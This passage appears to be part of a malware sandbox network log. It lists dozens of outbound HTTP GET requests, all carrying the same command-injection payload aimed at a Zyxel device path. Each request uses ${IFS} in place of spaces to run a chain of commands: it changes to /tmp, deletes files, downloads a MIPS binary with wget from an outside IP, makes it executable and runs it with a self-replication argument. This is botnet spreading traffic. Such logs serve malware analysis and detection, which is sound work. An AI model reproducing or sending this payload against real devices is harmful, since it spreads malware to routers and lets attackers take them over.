                                      Jan 14, 2024 15:50:50.397931099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5340192.168.2.1434216138.166.97.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397974968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5341192.168.2.1435436118.184.29.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398017883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5342192.168.2.145630047.191.197.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398070097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5343192.168.2.1454726210.255.45.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398142099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5344192.168.2.145475478.181.241.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398185968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5345192.168.2.1433762162.248.159.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398247957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5346192.168.2.1451974187.85.211.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398293018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5347192.168.2.1443262161.225.162.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398349047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5348192.168.2.1447650206.64.89.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398395061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5349192.168.2.145201024.82.247.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398413897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5350192.168.2.146066066.17.191.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398480892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5351192.168.2.144183682.186.183.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398538113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5352192.168.2.14338604.81.237.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398571968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5353192.168.2.146041297.194.90.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398628950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5354192.168.2.145534632.139.211.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398693085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5355192.168.2.1458878210.168.76.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398718119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5356192.168.2.1434208129.74.252.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398778915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5357192.168.2.1439754170.69.73.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398844004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5358192.168.2.1460602115.247.172.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398900986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5359192.168.2.143752691.194.193.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.398957014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5360192.168.2.1435404133.78.140.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399003983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5361192.168.2.143885040.94.125.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399063110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5362192.168.2.143879031.212.244.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399106026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5363192.168.2.145488272.224.98.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399142027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5364192.168.2.145596850.115.55.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399209976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5365192.168.2.1458982159.61.201.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399271965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5366192.168.2.1433056130.129.244.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399327993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5367192.168.2.143595646.15.1.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399360895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5368192.168.2.1452224113.50.39.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399441957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5369192.168.2.1448832118.40.111.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399480104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5370192.168.2.1434132162.206.136.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399554014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5371192.168.2.1443942103.162.178.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399621964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5372192.168.2.1441034176.108.65.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399693966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5373192.168.2.1451182109.194.195.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399733067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5374192.168.2.1448904122.122.213.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399791002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5375192.168.2.144242695.54.161.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399863005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5376192.168.2.14546241.115.171.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399907112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5377192.168.2.1458064189.214.78.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.399966955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5378192.168.2.144111020.127.99.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400028944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5379192.168.2.14507369.21.255.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400065899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5380192.168.2.1450706186.176.224.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400104046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5381192.168.2.145318882.146.125.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400170088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5382192.168.2.145094651.178.48.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400243998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5383192.168.2.1438606147.229.227.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400298119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5384192.168.2.1443272138.236.67.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400336027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5385192.168.2.146069447.251.5.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400404930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5386192.168.2.146082096.52.247.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400453091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5387192.168.2.1459172131.100.114.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400475025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5388192.168.2.1437264198.29.205.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400541067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5389192.168.2.144741688.29.51.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400571108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5390192.168.2.1443870173.60.118.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400629044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5391192.168.2.1444298131.179.250.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400664091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5392192.168.2.1447276221.125.224.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400727034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5393192.168.2.145207486.26.224.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400785923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5394192.168.2.1434746130.42.74.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400856972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5395192.168.2.1455048151.18.127.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400911093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5396192.168.2.1450948122.180.251.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400945902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5397192.168.2.14346488.89.22.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.400986910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5398192.168.2.1459530190.191.147.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401051044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5399192.168.2.1441996128.217.172.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401122093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5400192.168.2.1435284223.140.34.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401184082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5401192.168.2.143565417.60.72.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.401233912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5402192.168.2.1449398114.111.93.88443
                                      TimestampBytes transferredDirectionData
